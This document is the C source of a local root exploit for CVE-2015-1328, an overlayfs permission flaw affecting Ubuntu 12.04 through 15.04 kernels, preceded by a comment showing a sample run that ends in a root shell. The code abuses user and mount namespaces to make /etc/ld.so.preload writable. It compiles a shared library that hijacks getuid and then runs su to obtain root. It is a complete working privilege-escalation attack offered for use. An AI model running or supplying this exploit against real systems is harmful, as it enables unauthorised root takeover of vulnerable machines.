overlayfs local root in ubuntu

1. /*
2. # Exploit Title: ofs.c - overlayfs local root in ubuntu
3. # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
4. # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
5. # CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
6.  
7. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
8. CVE-2015-1328 / ofs.c
9. overlayfs incorrect permission handling + FS_USERNS_MOUNT
10.  
11. user@ubuntu-server-1504:~$ uname -a
12. Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
13. user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
14. user@ubuntu-server-1504:~$ id
15. uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
16. user@ubuntu-server-1504:~$ ./ofs
17. spawning threads
18. mount #1
19. mount #2
20. child threads done
21. /etc/ld.so.preload created
22. creating shared library
23. # id
24. uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)
25.  
26. greets to beist & kaliman
27. 2015-05-24
28. %rebel%
29. *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
30. */
31.  
32. #include <stdio.h>
33. #include <stdlib.h>
34. #include <unistd.h>
35. #include <sched.h>
36. #include <sys/stat.h>
37. #include <sys/types.h>
38. #include <sys/mount.h>
39. #include <stdio.h>
40. #include <stdlib.h>
41. #include <unistd.h>
42. #include <sched.h>
43. #include <sys/stat.h>
44. #include <sys/types.h>
45. #include <sys/mount.h>
46. #include <sys/types.h>
47. #include <signal.h>
48. #include <fcntl.h>
49. #include <string.h>
50. #include <linux/sched.h>
51.  
52. #define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"
53.  
54. static char child_stack[1024*1024];
55.  
56. static int
57. child_exec(void *stuff)
58. {
59.     char *file;
60.     system("rm -rf /tmp/ns_sploit");
61.     mkdir("/tmp/ns_sploit", 0777);
62.     mkdir("/tmp/ns_sploit/work", 0777);
63.     mkdir("/tmp/ns_sploit/upper",0777);
64.     mkdir("/tmp/ns_sploit/o",0777);
65.  
66.     fprintf(stderr,"mount #1\n");
67.     if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
68. // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
69.         if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
70.             fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
71.             exit(-1);
72.         }
73.         file = ".access";
74.         chmod("/tmp/ns_sploit/work/work",0777);
75.     } else file = "ns_last_pid";
76.  
77.     chdir("/tmp/ns_sploit/o");
78.     rename(file,"ld.so.preload");
79.  
80.     chdir("/");
81.     umount("/tmp/ns_sploit/o");
82.     fprintf(stderr,"mount #2\n");
83.     if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
84.         if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
85.             exit(-1);
86.         }
87.         chmod("/tmp/ns_sploit/work/work",0777);
88.     }
89.  
90.     chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
91.     umount("/tmp/ns_sploit/o");
92. }
93.  
94. int
95. main(int argc, char **argv)
96. {
97.     int status, fd, lib;
98.     pid_t wrapper, init;
99.     int clone_flags = CLONE_NEWNS | SIGCHLD;
100.  
101.     fprintf(stderr,"spawning threads\n");
102.  
103.     if((wrapper = fork()) == 0) {
104.         if(unshare(CLONE_NEWUSER) != 0)
105.             fprintf(stderr, "failed to create new user namespace\n");
106.  
107.         if((init = fork()) == 0) {
108.             pid_t pid =
109.                 clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
110.             if(pid < 0) {
111.                 fprintf(stderr, "failed to create new mount namespace\n");
112.                 exit(-1);
113.             }
114.  
115.             waitpid(pid, &status, 0);
116.  
117.         }
118.  
119.         waitpid(init, &status, 0);
120.         return 0;
121.     }
122.  
123.     usleep(300000);
124.  
125.     wait(NULL);
126.  
127.     fprintf(stderr,"child threads done\n");
128.  
129.     fd = open("/etc/ld.so.preload",O_WRONLY);
130.  
131.     if(fd == -1) {
132.         fprintf(stderr,"exploit failed\n");
133.         exit(-1);
134.     }
135.  
136.     fprintf(stderr,"/etc/ld.so.preload created\n");
137.     fprintf(stderr,"creating shared library\n");
138.     lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
139.     write(lib,LIB,strlen(LIB));
140.     close(lib);
141.     lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
142.     if(lib != 0) {
143.         fprintf(stderr,"couldn't create dynamic library\n");
144.         exit(-1);
145.     }
146.     write(fd,"/tmp/ofs-lib.so\n",16);
147.     close(fd);
148.     system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
149.     execl("/bin/su","su",NULL);
150. }